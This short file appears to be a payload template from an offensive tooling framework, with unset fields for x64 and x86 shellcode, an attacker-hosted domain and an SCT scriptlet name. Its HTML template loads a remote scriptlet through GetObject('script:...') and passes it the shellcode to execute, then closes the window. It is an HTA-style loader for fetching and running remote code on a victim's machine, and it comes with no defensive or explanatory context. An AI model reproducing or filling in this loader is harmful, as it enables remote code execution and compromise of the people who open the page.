[ShellCodex64]
value: notSet

[ShellCodex86]
value: notSet

[HostedDomain]
value: notSet

[HostedSct]
value: notSet

[Template]
data:
	<html>
		<script>
			var a = GetObject('script:${HostedDomain:value}/${HostedSct:value}');
			var x64 = "${ShellCodex64:value}"
			var x86 = "${ShellCodex86:value}"
			a.Exec(x86, x64);
			close();
		</script>
	</html>
